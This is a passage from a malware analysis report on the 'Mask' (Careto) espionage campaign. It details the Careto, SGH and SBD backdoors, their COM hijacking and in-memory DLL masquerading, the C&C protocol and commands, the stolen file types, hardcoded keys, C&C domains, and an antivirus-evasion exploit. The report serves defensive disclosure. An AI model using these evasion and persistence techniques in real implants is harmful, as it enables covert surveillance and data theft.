REMOTE_ADDR: 88.x.x.x
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
The Mask\xe2\x80\x99s implants can intercept network traffic, keystrokes, Skype conversations, analyse WiFi traffic, PGP keys, fetch all information from Nokia devices, screen captures and monitor all file operations. The malware collects a large list of documents from the infected system, including encryption keys, VPN configurations, SSH keys and RDP files. There are also several unknown extensions being monitored that we have not been able to identify and could be related to custom military/government-level encryption tools. Full list of stolen files extensions: *.AKF,*.ASC,*.AXX,*.CFD,*.CFE,*.CRT,*.DOC,*.DOCX,*.EML,*.ENC,*.GMG, *.GPG,*.HSE,*.KEY,*.M15,*.M2F,*.M2O,*.M2R,*.MLS,*.OCFS,*.OCU,*.ODS, *.ODT,*.OVPN,*.P7C,*.P7M,*.P7Z,*.PAB,*.PDF,*.PGP,*.PKR,*.PPK,*.PSW,*. PXL,*.RDP,*.RTF,*.SDC,*.SDW,*.SKR,*.SSH,*.SXC,*.SXW,*.VSD,*.WAB,*. WPD,*.WPS,*.WRD,*.XLS,*.XLSX, Inside the main Careto binaries there is a CAB file with two modules - 32 and 64-bit. shlink32.dll shlink64.dll 9 TLP: GREEN The malware extracts one of them depending on the system architecture and installs it as ""objframe.dll"". Inside the backdoor there are three executable files, once again, packed with CAB and having the .jpg extension: dinner.jpg waiter.jpg chef.jpg. The attackers call the more sophisticated malware SGH. We discovered the attackers trying to install multiple plugins for it. Also we have found traces of lateral movement tools, such as a module for Metasploit with the \xe2\x80\x9cwin7elevate\xe2\x80\x9d artifact. 2.2.1. Overview The attackers use two software packages and several related utilities. The main software packages are named \xe2\x80\x9cCareto\xe2\x80\x9d and \xe2\x80\x9cSGH\xe2\x80\x9d. The backdoor package called \xe2\x80\x9cCareto\xe2\x80\x9d is a general purpose backdoor that consists of user-level components. It collects system information and executes arbitrary code provided by the C&C infrastructure. The backdoor package called \xe2\x80\x9cSGH\xe2\x80\x9d is more advanced and primarily works in kernel mode. It contains rootkit components and interceptor modules for system events and file operations. It steals files and maintains its own connection to C&C servers. In addition to \xe2\x80\x9cCareto\xe2\x80\x9d and \xe2\x80\x9cSGH\xe2\x80\x9d, we observed the usage of a custom compiled backdoor based on the \xe2\x80\x9csbd\xe2\x80\x9d open source \xe2\x80\x9cnetcat\xe2\x80\x9d clone (https://www.freshports.org/net/sbd/). This \xe2\x80\x9csbd\xe2\x80\x9d clone has been observed in variants for Win32, Mac OS X and Linux. During the investigation, we were able to obtain the Win32 and Mac OS X versions; the Linux variant was badly damaged and could not be recovered. While Careto and SGH can also work as a \xe2\x80\x9cstandalone\xe2\x80\x9d implant, we observed the C&C installing one package using the other one - for instance, a victim infected with Careto would get the SGH as well. Additionally, several utilities like the uninstaller module \xe2\x80\x9cknows\xe2\x80\x9d about both of them, meaning they are commonly used together, although they may have been designed separately. Files from the backdoor packages used by the \xe2\x80\x9cMask\xe2\x80\x9d are signed using the same certificate, belonging to a (fake?) Bulgarian company named \xe2\x80\x9cTecSystem Ltd.\xe2\x80\x9d. https://www.freshports.org/net/sbd/ 10 TLP: GREEN 2.2.2. The Careto backdoor Careto is the name given by the attackers to one of the two main implants used on victims\xe2\x80\x99 machines. Careto is a Spanish slang term, meaning \xe2\x80\x9cugly face\xe2\x80\x9d or \xe2\x80\x9cmask\xe2\x80\x9d. Installation module - Microsoft Windows version The \xe2\x80\x9cCareto\xe2\x80\x9d software package is installed using a standalone executable installer. Once the installer is delivered and executed on the victim machine, it extracts the components and sets them up. File type: PE32, Windows Executable file Compilation timestamp: 2007.08.14 01:45:14 (GMT) - (all known variants) File sizes: 320.328, 320.904 bytes. Technical details The files are compiled with Visual Studio 2005. There are several known versions of the installer module that contain a correct but expired digital signature: Name of signer: TecSystem Ltd., Sofia, BG Serial: 36BE4AD457F062FA77D87595B8CCC8CF Valid: 2011.06.28 \xe2\x80\x93 2013.06.28 Digital signature All the important strings and the payload are encrypted. When started, the module checks for the presence of \xe2\x80\x9cBaseNamedObject\xe2\x80\x9d EVENT with \xe2\x80\x9c*\xe2\x80\x9d in the data. If found, it exits. The module contains three encrypted blocks in its body. The biggest one (first block) is 205.638 bytes long and is an encrypted CAB file that contains the actual payload to be installed. The second one is a 96-byte long configuration block that controls the filename to be used during the installation and the file description. In our case, the name was \xe2\x80\x9cobjframe.dll\xe2\x80\x9d. To decrypt the payload\xe2\x80\x99s and installer\xe2\x80\x99s configuration, the attackers use a fixed RC4 key: ""!$7be&.Kaw-12[}"". The third block is 880 bytes long and contains the configuration of the payload itself. It is written in the body of the installed binary and decrypted by that binary during operation. To write this configuration block, the module searches for a magic binary string and copies an encrypted configuration block by the marker. The resulting file is then installed into the system. The magic markers are expected to be located 0x10 bytes before the configuration block and 0x10 bytes after that block. 11 TLP: GREEN The CAB archive that holds the payloads contains two files: Name File Size Compilation Time Shlink64.dll 144384 bytes 14.07.2009 01:16:44 Shlink64.dll 106496 bytes 14.07.2009 01:16:44 The installer is 64-bit aware and extracts the file for the appropriate system architecture: \xe2\x80\x9cshlink32.dll\xe2\x80\x9d for a 32-bit system and \xe2\x80\x9cShlink64.dll\xe2\x80\x9d for 64-bit one, respectively. Installation is also Microsoft Windows version-aware. For Windows Vista and higher without administrator privileges, it installs into %APPDATA%. For previous Windows versions with administrator privileges, it installs in the %system% directory. The installer also verifies the system configuration and makes sure it works well under all situations. For instance, it checks if the value of the registry key ""HKLM\\Software\\Microsoft\\Windows\\Current Version\\Policies\\System"" is set to ""EnableLUA"" to determine if UAC enabled. If UAC is enabled, it defaults to user installation to evade any notification to the user. In the case that it failed to install to system directory, the module also falls back to userland installation. The userland installation path is: \xe2\x80\x9c%APPDATA%\\Microsoft\xe2\x80\x9d. In order to make the infection less obvious, it assigns itself the same file timestamp as of \xe2\x80\x9ckernel32.dll\xe2\x80\x9d during installation. Also it modifies the resources of the EXE being installed, so all its Version Information strings are taken from Kernel32 DLL except the filename and file description. These are taken from the encrypted configuration block, i.e.: File name: ""objframe.dll"". File description"" ""Microsoft\xc2\xae Object frame manager"" The payload is also registered as a COM object via registry entry: [HKCU\\Software\\Classes\\\\CLSID\\{ECD4FC4D-521C-11D0-B792- 00A0C90312E1}\\InprocServer32 ] %default%=%path to the installed payload file% The original registry value is saved in the following registry key: [HKLM\\Software\\Classes\\CLSID\\{E6BB64BE-0618-4353-9193- 0AFE606D6F0C}\\InprocServer32] %default%=%original registry value% 12 TLP: GREEN Main module We were able to locate several versions of the main module. As with the Installation Module, the files are compiled with Visual Studio 2005. File type: PE32/PE32+ DLL Compilation timestamps: 2004.08.04 07:54:15 (GMT), 2008.04.14 02:33:02 (GMT), 2009.07.14 01:09:01 (GMT), 2012.04.25 21:05:48 (GMT), 2012.10.03 04:58:02 (GMT), 2013.01.04 04:49:18 (GMT) File sizes: 110.592, 106.496, 144.384 bytes Technical details The main module is activated in every application that requests for the COM object referenced by the class ID it has overtaken: {ECD4FC4D-521C-11D0-B792-00A0C90312E1} Windows Explorer appears to be the primary target of this COM object hijacking. The name of the hijacked class is called \xe2\x80\x9cShell Rebar BandSite\xe2\x80\x9d. The module uses an interesting evasion technique to hide its presence in the system. Once activated, it first reads the registry value that points to the dynamic library that exports the original COM object: HKEY_CLASSES_ROOT\\CLSID\\{E6BB64BE-0618-4353-9193- 0AFE606D6F0C}\\InprocServer32 It loads the original library and modifies the module list of the process, first replacing its own entry with a copy of the data from the hijacked DLL, and then completely removes all references to itself in PEB LDR linked lists. Next, it loads one of the system libraries that is not currently loaded by the current process, from the following list: CHTBRKR.DLL CLICONFG.DLL DMCONFIG.DLL MFC42.DLL MFWMAAEC.DLL MSJET40.DLL NTDSA.DLL OAKLEY.DLL OPENGL32.DLL PIDGENX.DLL PNPUI.DLL QMGR.DLL QUARTZ.DLL VERIFIER.DLL WMDRMDEV.DLL WMDRMNET.DLL WMICMIPLUGIN.DLL WMNETMGR.DLL WPDSP.DLL 13 TLP: GREEN After the system library is loaded, its contents are overwritten with the malicious library, but the module path and other data are kept intact. So, to someone looking with a process analysis tool, the malicious library appears as a clean system DLL in the module list of the top process. It can be only identified by inspecting the actual contents of the memory allocated to the system library. The module transfers control to its copy by calling its DllMain function with DLL_THREAD_ATTACH parameter and a custom lpReserved value that points to a configuration structure containing a valid magic number. When DllMain is called with these parameters, it proceeds to execute its main functionality. First, it decrypts the CAB file from its body using the same RC4 key as in the installer module, and checks its contents. Name File Size Compilation Time dinner32.jpg 25088 bytes 14.07.2009 01:16:44 chef32.jpg waiter32.jpg 8192 bytes 94208 bytes 14.07.2009 01:16:44 14.07.2009 01:16:44 Figure 4. CAB contets for shlink32.dll Name File Size Compilation Time dinner64.jpg chef64.jpg waiter64.jpg dinner32.jpg 18432 bytes 10240 bytes 97280 bytes 25088 bytes 14.07.2009 01:16:44 14.07.2009 01:16:44 14.07.2009 01:16:44 14.07.2009 01:16:44 chef32.jpg waiter32.jpg 8192 bytes 94208 bytes 14.07.2009 01:16:44 14.07.2009 01:16:44 Figure 5. CAB contets for shlink64.dll The module searches for a file named \xe2\x80\x9cwaiter32.jpg\xe2\x80\x9d or \xe2\x80\x9cwaiter64.jpg\xe2\x80\x9d, depending on the platform. It loads this module the same way as its own copy, replacing another system DLL in memory and executes its DllMain function in DLL_THREAD_ATTACH mode and passes the configuration structure as the lpReserved parameter. The \xe2\x80\x9cwaiter\xe2\x80\x9d module is called in the \xe2\x80\x9cexplorer\xe2\x80\x9d mode of operation (see \xe2\x80\x9cWaiter module\xe2\x80\x9d). It then intercepts the \xe2\x80\x9cCreateProcessW\xe2\x80\x9d function in libraries \xe2\x80\x9cshell32.dll\xe2\x80\x9d and \xe2\x80\x9cieframe.dll\xe2\x80\x9d with its own routine. That routine modifies the process creation flags, forcing the process to start in suspended mode, and performs additional processing if the process being launched belongs to the list of browser\xe2\x80\x99s filenames: \xe2\x80\x9cIEXPLORE.EXE, FIREFOX.EXE, CHROME.EXE\xe2\x80\x9d. The module infects the intercepted browser processes by injecting all the three modules from the CAB archive in its memory: \xe2\x80\x9cdinner\xe2\x80\x9d, \xe2\x80\x9cchef\xe2\x80\x9d and \xe2\x80\x9cwaiter\xe2\x80\x9d. These modules are created in memory of the target process and execution is passed to the \xe2\x80\x9cdinner\xe2\x80\x9d module by queueing an APC call to its main function. The main module notifies its \xe2\x80\x9cwaiter\xe2\x80\x9d module about the injected modules and connects them using anonymous pipes. 14 TLP: GREEN \xe2\x80\x9cDinner\xe2\x80\x9d module This module is compiled as an executable, but its entry point function is only executed via an APC remote call and it accepts a single parameter. File type: PE32/PE32+ EXE Compilation timestamps: 2012.04.25 21:05:20 (GMT), 2012.04.25 21:05:40 (GMT), 2013.01.15 00:30:03 (GMT), 2013.01.15 20:18:55 (GMT), 2013.05.21 20:40:45 (GMT) File sizes: 25088, 18432 bytes Technical details It Loads the library \xe2\x80\x9ciertutil.dll\xe2\x80\x9d and patches its import in \xe2\x80\x9cadvapi32.dll\xe2\x80\x9d, \xe2\x80\x9cGetSidSubAuthority\xe2\x80\x9d. Then, it executes the command: iexplore.exe shell.{3F9F6D47-FE76-4B11-8B70-780ED19091B1} and also patches the \xe2\x80\x9cOpenEvent\xe2\x80\x9d and \xe2\x80\x9cCreateProcessW\xe2\x80\x9d API in \xe2\x80\x9cURLMON\xe2\x80\x9d library. After applying patches to the system libraries, the module reloads the \xe2\x80\x9cchef\xe2\x80\x9d and \xe2\x80\x9cwaiter\xe2\x80\x9d modules in system DLLs the same way as the main module and invokes the \xe2\x80\x9cwaiter\xe2\x80\x9d module in the \xe2\x80\x9cinternet\xe2\x80\x9d mode (See \xe2\x80\x9cWaiter module\xe2\x80\x9d). \xe2\x80\x9cChef\xe2\x80\x9d module This module implements network connectivity features for the package. File type: PE32/PE32+ DLL Compilation timestamps: 2012.04.25 21:02:09 (GMT), 2012.04.25 21:02:43 (GMT), 2013.01.15 00:27:54 (GMT), 2013.01.15 20:16:55 (GMT), 2013.05.21 20:38:23 (GMT) File sizes: 8192, 10240 bytes Technical details When loaded by the \xe2\x80\x9cdinner\xe2\x80\x9d module, it returns a structure that contains pointers to four functions. These functions can send HTTP/HTTPS \xe2\x80\x9cGET\xe2\x80\x9d and \xe2\x80\x9cPOST\xe2\x80\x9d requests using a given URL. The addresses of these functions are passed to the \xe2\x80\x9cwaiter\xe2\x80\x9d module. 15 TLP: GREEN The module uses the following fixed User-Agent string for all HTTP requests: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT) \xe2\x80\x9cWaiter\xe2\x80\x9d module This module implements all the logic of the \xe2\x80\x9cCareto\xe2\x80\x9d package. File type: PE32/PE32+ DLL Compilation timestamps: 2012.04.25 21:02:02 (GMT), 2012.04.25 21:02:37 (GMT), 2013.01.15 00:27:54 (GMT), 2013.01.15 20:17:09 (GMT), 2013.05.21 20:38:36 (GMT) File sizes: 94208, 97280 bytes Technical details The encrypted configuration block is either loaded from the registry or taken from the caller and saved to the registry. The exact location of the registry key is read from the configuration block. Known locations are: HKCU/HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WindowsUpdate CISCNF4654 CISCNF0654 Figure 6. Decrypted configuration block In \xe2\x80\x9cexplorer\xe2\x80\x9d mode, it stores the handles of loaded modules and monitors the process termination to free unused handles. This is another example of careful the Careto 16 TLP: GREEN authors were to make sure the infected machine is stable and un-noticed by the victims. When executed in the \xe2\x80\x9cexplorer\xe2\x80\x9d mode, it waits 60 seconds for the dinner/chef pair to be properly loaded in the browser\xe2\x80\x99s process. Once there is such a process, it sends a command to its instance injected in the browser activating the connection to the C&C server. When running in the browser\xe2\x80\x99s process (\xe2\x80\x9cinternet\xe2\x80\x9d mode), it enters an infinite loop waiting for commands from the anonymous pipe provided by its \xe2\x80\x9cexplorer\xe2\x80\x9d mode instance and handles all C&C communication when requested. The C&C server provides the commands inside CAB files, one archive per request. The archive is expected to contain a text file named \xe2\x80\x9cMeta.inf\xe2\x80\x9d. This file contains various configuration parameters and commands to be executed by the module. #Wed Oct 09 14:55:09 BST 2013 AIT_PARAMS=-s -h -n -t -p -w 0 DLL32_FILE_NAME=CDllAIT32.dll DLL64_FILE_NAME=CDllAIT64.dll DATE_GENERATION=20131009T145509.009 TYPE=CMD CLIENT_ID=Client0650 CMD_SEQ=0001 INST_ID=4499149305321491 SUB_TYPE=CANNEDDLL TARGET_PROCESS=explorer PRODUCT_CODE=C314 W=0 Sample Meta.inf file The commands can be executed either in the module injected in browser, or by the original instance loaded via COM spoofing. The \xe2\x80\x9cTARGET_PROCESS\xe2\x80\x9d values are \xe2\x80\x9cinternet\xe2\x80\x9d and \xe2\x80\x9cexplorer\xe2\x80\x9d, determining the operation mode. 17 TLP: GREEN Below is the full list of implemented commands: UPLOAD Write a file from the CAB archive to the infected machine. The location can be relative to a CSIDL or environment variable. EXEC Launch the specified executable with parameters UPLOADEXEC Write a file from the CAB archive to the infected machine and then run it with the given parameters SYSTEMREPORT Compile a system report and upload it to C&C: \xe2\x97\x8f main module's file name \xe2\x97\x8f proxy server settings \xe2\x97\x8f list of installed programs \xe2\x97\x8f OS version, type, Service Pack version \xe2\x97\x8f list of network adapters' MAC addresses \xe2\x97\x8f availability of direct connection to www.microsoft.com:80 \xe2\x97\x8f values of environmental variables \xe2\x97\x8f list of users SETLATENCY Modify the delay before operation in the configuration block and update the registry. Report back in \xe2\x80\x9cSetLatencyLog.txt\xe2\x80\x9d CANNEDDLL Load the executable module from the CAB archive and execute it in memory. SETCFG Modify the data of the encrypted configuration block: primary or secondary URL of the C&C server, number of attempts to try for each of them. http://www.microsoft.com/ http://www.microsoft.com/ 18 TLP: GREEN 2.2.3. The SGH backdoor The SGH backdoor is a lot more sophisticated than the Careto implant. It is designed to perform a large amount of surveillance functions, on a highly modular platform that can be easily extended. Installation module This module installs the complete SGH software package using a custom installation script that is encrypted in its body. File type: PE32 EXE Compilation timestamps: 2013.05.09 11:20:08 (GMT), 2013.06.19 11:17:45 (GMT) File sizes: 348264, 359936 bytes Technical details The files are compiled with Visual Studio 2005. One version of the installer module is signed by a certificate from the same (fake?) company TecSystem Ltd from Bulgaria: Name of signer: TecSystem Ltd., Sofia, BG Serial: 0E808F231515BC519EEA1A73CDF3266F Validity: 2013.04.18 \xe2\x80\x93 2016.07.18 Digital Certificate The SGH package is somehow special and it is what originally attracted our attention to this cyberespionage operation. When started, it first tries to exploit a vulnerability in older Kaspersky products. The way the attack works is the following: first, it tries to open the handle of the Kaspersky system driver, \xe2\x80\x9c\\\\.\\KLIF\xe2\x80\x9d and sends a custom DeviceIoControl code. If the call succeeds, the module and all processed named \xe2\x80\x9cservices.exe\xe2\x80\x9d are no longer checked by the antivirus engine. This method theoretically allows the attacker to survive the addition of signatures for the malware components, as the product won\xe2\x80\x99t be able to detect them because they have been \xe2\x80\x9cwhitelisted\xe2\x80\x9d. In practice, we can say the attack is only half baked, because detection for the other top modules will precede SGH and kill it before it loads. Nevertheless, it was this attack against our older products that brought our attention to Careto and allowed us to discover it in the first place. The SGH module is relatively complex and has many functionalities, but in essence it is an infinitely extensible attack platform. In addition to the default plugins available in the installation module, the attackers can also deploy other extensions to perform more complex tasks. To operate, SGH uses encrypted virtual file systems that store extensions and activity logs. 19 TLP: GREEN On startup, the module locates a PE section with name \xe2\x80\x9c.inf\xe2\x80\x9d in its own file. This section contains the encrypted and compressed binary installation script. The section is decrypted with RC4 using a hardcoded key and then unpacked with \xe2\x80\x9czlib\xe2\x80\x9d\xe2\x80\x99s inflate function. The installer parses the script, executes all the commands and then deletes its own file and exits. The installation script is a list of binary tagged entries of variable length. Entries can be of one of the following types: 1, 19 Depending on the additional parameter, operate in one of the following modes: 1. Install the file into the victim's system 2. Download a file from a given URL (http, https, ftp, gopher) and either install it or treat as an additional installation script. The file can be installed into a directory of choice: - system directory - temporary directory - system drivers directory - other location specified in the installation entry 2 Remove a previously installed file 3 Write a registry value. Create the key if necessary. 4 Delete a registry value or a complete registry key, recursively. 5 Copy data from one registry value to another 6 Compare a registry value's date with the specified value. Abort the installation if the values are not equal. 7 Create a new system service 8 Delete a system service by name 9 Start a system service by name 10 Stop a system service by name 11 No operation 12 Create a process with given arguments 13 Show a message box 14 Append an existing registry value 15 Add an USB device filter via Windows Setup API 16 Remove an USB device filter via Windows Setup API 17 Add a certificate to the system Certificate Storage 18 Delete a certificate from the system Certificate Storage 20 Exit if the installer is NOT running in a virtual machine 21 Exit if the installer is running in a virtual machine 22 Infect the system \xe2\x80\x9cbootmgr\xe2\x80\x9d file with provided code 23 Write the buffer to a temporary file with prefix \xe2\x80\x9c___\xe2\x80\x9d and execute it 20 TLP: GREEN The installer module can detect if it is being executed in a VMWare or Microsoft Virtual PC virtual machine. We have discovered two different installation scripts so far. The decoded versions of these scripts look like the following: Script 1: Install file(SystemDir, awdcxc32.dll, 8192 bytes) Install file(SystemDir, mfcn30.dll, 17920 bytes) Install file(SystemDir, vchw9x.dll, 20992 bytes) Install file(SystemDir, awcodc32.dll, 24576 bytes) Install file(SystemDir, jpeg1x32.dll, 31744 bytes) Install file(SystemDir, bootfont.bin, 122912 bytes) Install file(DriversDir, scsimap.sys, 14464 bytes) WriteRegistry(80000002\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\\PrefetchParameters, EnablePrefetcher) CreateService(scsimap, System32\\DRIVERS\\scsimap.sys) WriteRegistry(80000002\\SYSTEM\\CurrentControlSet\\Services\\scsimap\\Params, Value) StartService(scsimap) WriteTempExecute(9320 bytes) Script 2: Install file(SystemDir, awdcxc32.dll, 8192 bytes) Install file(SystemDir, mfcn30.dll, 17920 bytes) Install file(SystemDir, vchw9x.dll, 20992 bytes) Install file(SystemDir, awcodc32.dll, 24576 bytes) Install file(SystemDir, jpeg1x32.dll, 31744 bytes) Install file(SystemDir, bootfont.bin, 126880 bytes) Install file(DriversDir, scsimap.sys, 14464 bytes) WriteRegistry(80000002\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\\PrefetchParameters, EnablePrefetcher) CreateService(scsimap, System32\\DRIVERS\\scsimap.sys) WriteRegistry(80000002\\SYSTEM\\CurrentControlSet\\Services\\scsimap\\Params, Value) StartService(scsimap) WriteTempExecute(10344 bytes) Install file(SystemDir, siiw9x.dll, 15360 bytes) StartService(ipfilterdriver) WriteRegistry(80000002\\SYSTEM\\CurrentControlSet\\Services\\IpFilterDriver, Start) It\xe2\x80\x99s important to point that the file names used for the DLLs during installation are not unique and are also used by legitimate software. For instance, the driver named \xe2\x80\x9cscsimap.sys\xe2\x80\x9d was present in older versions of Windows. If the installation script was executed successfully the infected machine now has a new system service named \xe2\x80\x9cscsimap\xe2\x80\x9d that loads the main SGH's driver \xe2\x80\x9cscsimap.sys\xe2\x80\x9d. 21 TLP: GREEN SGH plugin modules The following table provides the full list of plugin modules and a brief description of their functionality. Module name Functionality Scsimap Orchestrator module for the platform components Config Operates configuration data in registry Storage Used to store activity logs in the system Cipher Provides cryptographic functions to other modules Cmprss Provides compression functions to other modules Loaddll Injects DLL payloads into processes PGPsdkDriver Keylogger Fileflt Intercepts file operations and collects content Stopsec Implements an attack against Kaspersky products TdiFlt, TdiFlt2 Intercept network traffic awdcxc32 Interacts with scsimap driver from user mode awcodc32 Interacts with C&C server via vchw9x module mfcn30 Provides a framework to extend the malware with new plugins vchw9x Provides network connectivity functions jpeg1x32 siiw9x SkypeIE6Plugin Nmwcdlog d3dx8_20 WifiScan awview32 CDllUninstall Used for uninstalling the malware Screen saver module Intercepts and records Skype conversations Gathers information from Nokia devices Takes screenshots of victim\xc2\xb4s desktop Retrieves the list of WiFi networks Collects victim\xc2\xb4s email messages Uninstalls malware For a detailed description of the modules, please check APPENDIX 2: SGH Modules. 22 TLP: GREEN 2.2.4. The SBD backdoor In addition to Careto and SGH, the \xe2\x80\x9cMask\xe2\x80\x9d attackers use another backdoor based on the public, open source \xe2\x80\x9cnetcat\xe2\x80\x9d clone \xe2\x80\x9csbd\xe2\x80\x9d. \xe2\x80\x9csbd\xe2\x80\x9d stands for \xe2\x80\x9cShadowinteger's Backdoor\xe2\x80\x9d and has been available at least since 2004. Figure 7: Original sdb copyright notice This backdoor has been observed for Win32, OS X and Linux. The Linux variant gets installed from the exploit server \xe2\x80\x9clinkconf[dot]net\xe2\x80\x9d through the Firefox plugins. Unfortunately, the plugins we retrieved from the server were badly damaged and could not be recovered. Nevertheless, they do seem to exist and are in use by the Mask attackers. The Mozilla Firefox plugin which installs the Linux \xe2\x80\x9cSBD\xe2\x80\x9d backdoor: Archive: af_l_addon.xpi Name Length Method Size Ratio Date Time CRC 32 chrome.manifest 183 Defl:N 101 45% 10-07-13 14:30 cc37d585 install.rdf 1274 Defl:N 443 65% 10-07-13 14:30 add50a10 bootstrap.js 1798 Defl:N 695 61% 10-07-13 14:30 52eecaba content/browser.xul 166 Defl:N 134 19% 10-07-13 14:30 74e9bad7 content/icon.png 66793 Defl:N 66664 0% 10-07-13 14:30 27609d6e plugins/sbd-linux 26020 Defl:N 22406 14% 10-07-13 14:30 a02b2e21 The Mozilla Firefox plugin that installs the \xe2\x80\x9cSBD\xe2\x80\x9d OS X backdoor: Archive: af_m_addon.xpi Name Length Method Size Ratio Date Time CRC 32 chrome.manifest 183 Defl:N 102 44% 10-07-13 14:30 aeac29ae install.rdf 1274 Defl:N 443 65% 10-07-13 14:30 f5ee7026 bootstrap.js 1796 Defl:N 695 61% 10-07-13 14:30 d5fc6c9b content/browser.xul 166 Defl:N 134 19% 10-07-13 14:30 74e9bad7 content/icon.png 66793 Defl:N 66664 0% 10-07-13 14:30 27609d6e plugins/sbd-mac 42720 Defl:N 37072 13% 10-07-13 14:30 12d19684 We were able to recover a working copy of the OS X \xe2\x80\x9csbd\xe2\x80\x9d backdoor, which we describe below. 23 TLP: GREEN 2.2.5. The OSX SBD backdoor The original OS X dropper found on the exploit server has the following identification information: File name: banner.jpg Type: Mach-O x86 32 bit binary MD5: 02e75580f15826d20fffb43b1a50344c Size: 46876 bytes Identification details This is a dropper for the main SBD backdoor. First, it copies the standard Safari application to \xe2\x80\x9c /Applications/.DS_Store.app\xe2\x80\x9d. Next, it creates the file \xe2\x80\x9c""/Applications/.DS_Store.app/Contents/MacOS/Update\xe2\x80\x9d and unpacks the main backdoor code into there. The installer carefully copies the timestamp from the original Safari \xe2\x80\x9cContents/Info.plist\xe2\x80\x9d for the backdoor, to make it harder to notice. For persistence, it modifies the \xe2\x80\x9c/Applications/.DS_Store.app/Contents/Info.plist\xe2\x80\x9d file with a reference to the main backdoor body, also carefully setting the timestamp on the \xe2\x80\x9c.plist\xe2\x80\x9d file, then it registers it in the system via \xe2\x80\x9cLibrary/LaunchAgents/com.apple.launchport.plist\xe2\x80\x9d. The \xe2\x80\x9c.plist\xe2\x80\x9d and main backdoor body are stored in the dropper in compressed (\xe2\x80\x9cbzip2\xe2\x80\x9d) format. They have the following identification information: Main \xe2\x80\x9cSBD\xe2\x80\x9d backdoor, OS X: Type: Mach-O x86 32 bit binary MD5: 1342ac151eea7a03d51660bb5db018d9 Size: 89828 bytes \xe2\x80\x9c.plist\xe2\x80\x9d data: Size: 582 bytes MD5: 4dae42d1b80c85b396546ed02a00e328 The Mask\xe2\x80\x99 version of the \xe2\x80\x9csbd\xe2\x80\x9d backdoor has a hardcoded C&C server, to which it connects on port 443. The attackers can then directly access the victim\xe2\x80\x99s machine through a shell. All important strings in the backdoor are encrypted with a simple XOR - for even positions, it is XOR 0x7f, for odd positions it is XOR 0x10. The C&C communication is encrypted with AES and uses SHA1 for cross- authentication. The encryption key used for communication is the following string 24 TLP: GREEN \xe2\x80\x9c/dev/null strdup() setuid(geteuid())\xe2\x80\x9d. The server address is encoded in the binary as follows: Figure 8: Encoded C&C address After applying th decryption algorithm, we get the real C&C address: itunes212.appleupdt[dot]com By means of passive DNS fingerprinting, we identified two other domains used by the attackers as C&C\xe2\x80\x99s. Here\xe2\x80\x99s a full list of the C&C servers for the OS X backdoor: Host name IP Server location itunes212.appleupdt.com 200.46.107.115 Panama, Net2net Corp. itunes214.appleupdt.com 200.46.107.116 Panama, Net2net Corp. itunes311.appleupdt.com 200.46.107.117 Panama, Net2net Corp. As of Feb 6th, 2014, the OS X \xe2\x80\x9cSBD\xe2\x80\x9d backdoor C&C domains have been suspended by Apple. 25 TLP: GREEN 2.3. Digital certificates Most Careto samples we obtained are signed by two different digital certificates belonging to the same company TecSystem Ltd, from Bulgaria. We don\xc2\xb4t know if this company is legitimate. Certificate 1: e l 36 be 4a d4 57 f0 62 fa 77 d8 75 95 b8 cc c8 cf m 71 a4 ee 9d 5d 6a 26 85 1e 35 25 60 93 69 22 ee b6 d5 9a 1f Certificate 2: e l 0e 80 8f 23 15 15 bc 51 9e ea 1a 73 cd f3 26 6f m 34 10 f8 cf 77 e1 7a 51 36 45 16 18 0c 3e 6d 46 b6 6c 93 c4 The first certificate was valid between 28.Jun.2011 - 28.Jun.2013. The second certificate was valid from 18.Apr.2013 - 18.Jul.2016. Figure 9: Digital certificate used The second valid certificate has been blacklisted by Verisign. 26 TLP: GREEN 2.4. Exploit for Kaspersy\xc2\xb4s products We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \xe2\x80\x9cinvisible\xe2\x80\x9d in the system. This vulnerability was solved in 2008, when all this module was remade from scratch and the communication protocol changed, including additional security checks. The attackers could have used this exploit for avoiding detection in some Workstation products prior version 6.0.4.*, and KAV/KIS 8.0 versions not updated properly (it was fixed during this release). Of course, this raised our interest and our research team decided to investigate further. In other words, the attackers attracted our attention by attempting to exploit Kaspersky Lab products. We have no knowledge of any other malware exploiting this vulnerability. 27 TLP: GREEN 2.5. Communication The communication between the C&Cs and the victims uses an encrypted protocol over HTTP or HTTPs. In case of the Careto implant, the C&C communication channel is protected with two layers of encryption. The data received from the C&C server is encrypted using a temporary AES key, which is also passed with the data and is encrypted with an RSA key. The same RSA key is used to encrypt the data that is sent back to the C&C server. This double encryption is uncommon and shows the high level of protection implemented by the authors of the campaign. So far, we observed two version of command and control modules, named \xe2\x80\x9cindex.cgi\xe2\x80\x9d, \xe2\x80\x9cmain.cgi\xe2\x80\x9d and \xe2\x80\x9ccommcgi.cgi\xe2\x80\x9d. These are used by the generations of the malicious modules to communicate with the attackers. The Careto implant uses \xe2\x80\x9cmain.cgi\xe2\x80\x9d, \xe2\x80\x9cindex.cgi\xe2\x80\x9d and \xe2\x80\x9ccommcgi.cgi\xe2\x80\x9d. SGH uses exclusively \xe2\x80\x9cindex.cgi\xe2\x80\x9d. During C&C connections, the \xe2\x80\x9cInstall\xe2\x80\x9d or \xe2\x80\x9cInst\xe2\x80\x9d parameters contain the unique ID assigned to the victim. Here\xe2\x80\x99s how a typical C&C query looks like: http(s)://SERVER/cgi-bin/commcgi.cgi? Group=XXX== &Install=VICTIMID &Ver=BACKDOORVERSION &Ask=BOOLEAN &Bn=NUMBER Known parameters for \xe2\x80\x9ccommcgi.cgi\xe2\x80\x9d and \xe2\x80\x9cindex.cgi\xe2\x80\x9d: Parameter Explanation Group Base-64 encoded hash of the first 16 bytes of the victim identifier Install Unique victim identifier Ver Implant version; C for Careto, S for SGH. Ask Request mode: \xe2\x80\x9c1\xe2\x80\x9d - requesting commands, \xe2\x80\x9c0\xe2\x80\x9d - reporting results CmdId Command id Ack Acknowledge on successful command execution on victim\xe2\x80\x99s machine Bn Hardcoded value, i.e. \xe2\x80\x9c3\xe2\x80\x9d 28 TLP: GREEN File Filename for exfiltrated data Offset Offset to write exfiltrated data Based on the \xe2\x80\x9cVer\xe2\x80\x9d parameter, we extracted the list of unique implant versions connecting to our sinkhole for the past weeks. Although most of the connections come from the Careto implant, there are some which indicate the possible presence of unknown 